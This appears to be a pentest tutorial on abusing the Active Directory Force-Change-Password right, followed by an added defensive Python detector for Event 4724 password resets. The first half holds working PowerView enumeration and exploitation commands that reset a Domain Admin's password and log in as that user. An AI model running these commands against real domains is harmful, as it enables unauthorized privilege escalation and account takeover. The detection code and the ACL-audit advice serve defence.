Force-Change-Password
Force-Change-Password: a permission that allows you to change a user's password. If you have Force-Change-Password on a user object, you can reset that user's password without knowing the current one, thereby escalating your privileges.
Enumeration
PowerView
Force-Change-Password Enumeration
Get your current user's SID by executing whoami /user, import PowerView, then execute the command below to get the list of objects on which you have Force-Change-Password.
Command
Get-ObjectAcl -ResolveGUIDs | ? {($_.SecurityIdentifier -eq "[your_current_user_sid]") -and ($_.ObjectAceType -eq "User-Force-Change-Password")}
The image below shows that the current user usman has the Force-Change-Password right on the user object ali.
User Enumeration
Execute the command below to get more information about the target user.
Command
Get-NetUser [target_user]
The image below shows that the target user ali is a member of Domain Admins.
BloodHound
You can also get the same result using BloodHound.
The image below shows that the current user usman has the GenericAll right on the user object ali, who is a member of Domain Admins.
Exploitation
PowerView
Reset Password
Since you have the Force-Change-Password right on user ali, you can reset his password and log in to his account by executing the commands below.
Command
$pass = ConvertTo-SecureString '[Your New Password Here]' -AsPlainText -Force
Set-DomainUserPassword -Identity [target_user] -AccountPassword $pass
runas /user:[domain\user] cmd.exe
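As an added, defender-side example (not from the original page): the reset performed above is an administrative password reset, which a domain controller records as Security Event 4724 ("An attempt was made to reset an account's password"). The Python below runs a simple detection over such records, raising a high-severity alert when the target is a privileged account (a Domain Admins member such as ali) and a medium one when the resetting principal is not on an allowlist of accounts authorized to reset passwords. The event records, SIDs, account names and allowlists are constructed sample data, and the 4724 field names are assumed to match the event's Subject / Target Account layout.

```python
"""Detect password resets (Event ID 4724) against privileged accounts or by
unauthorized principals. Sample records are constructed, not real log data."""
from dataclasses import dataclass

# Constructed sample events: helpdesk reset, an ordinary user resetting a
# Domain Admin, the matching 4738 (account changed), and an ordinary user
# resetting a non-privileged account.
SAMPLE_EVENTS = [
    {"EventID": 4724, "SubjectUserName": "helpdesk01", "SubjectUserSid": "S-1-5-21-1-1-1-1105",
     "TargetUserName": "bob", "TargetSid": "S-1-5-21-1-1-1-1201"},
    {"EventID": 4724, "SubjectUserName": "usman", "SubjectUserSid": "S-1-5-21-1-1-1-1108",
     "TargetUserName": "ali", "TargetSid": "S-1-5-21-1-1-1-1110"},
    {"EventID": 4738, "SubjectUserName": "usman", "SubjectUserSid": "S-1-5-21-1-1-1-1108",
     "TargetUserName": "ali", "TargetSid": "S-1-5-21-1-1-1-1110"},
    {"EventID": 4724, "SubjectUserName": "usman", "SubjectUserSid": "S-1-5-21-1-1-1-1108",
     "TargetUserName": "bob", "TargetSid": "S-1-5-21-1-1-1-1201"},
]
# Constructed allowlists: SIDs of Domain Admins members (the targets to protect)
# and of accounts that are permitted to perform resets (e.g. helpdesk).
PRIVILEGED_SIDS = {"S-1-5-21-1-1-1-1110"}       # ali
AUTHORIZED_RESETTERS = {"S-1-5-21-1-1-1-1105"}  # helpdesk01


@dataclass(frozen=True)
class Alert:
    severity: str
    subject: str
    target: str
    reason: str


def detect_suspicious_resets(events, privileged_sids, authorized_resetters):
    """Return one Alert per 4724 record that needs attention. Other event IDs
    (e.g. 4723 self-changes, 4738 account changes) are ignored; comparisons
    use SIDs rather than names so a renamed account cannot evade the rule."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4724:
            continue
        subject, target = ev["SubjectUserSid"], ev["TargetSid"]
        if target in privileged_sids:
            alerts.append(Alert("high", ev["SubjectUserName"], ev["TargetUserName"],
                                "password reset of a privileged account"))
        elif subject not in authorized_resetters:
            alerts.append(Alert("medium", ev["SubjectUserName"], ev["TargetUserName"],
                                "password reset by a principal not authorized to reset"))
    return alerts
```

Pair this with a periodic audit of which principals hold User-Force-Change-Password or GenericAll on privileged user objects, since the reset itself is only the last step of the abuse.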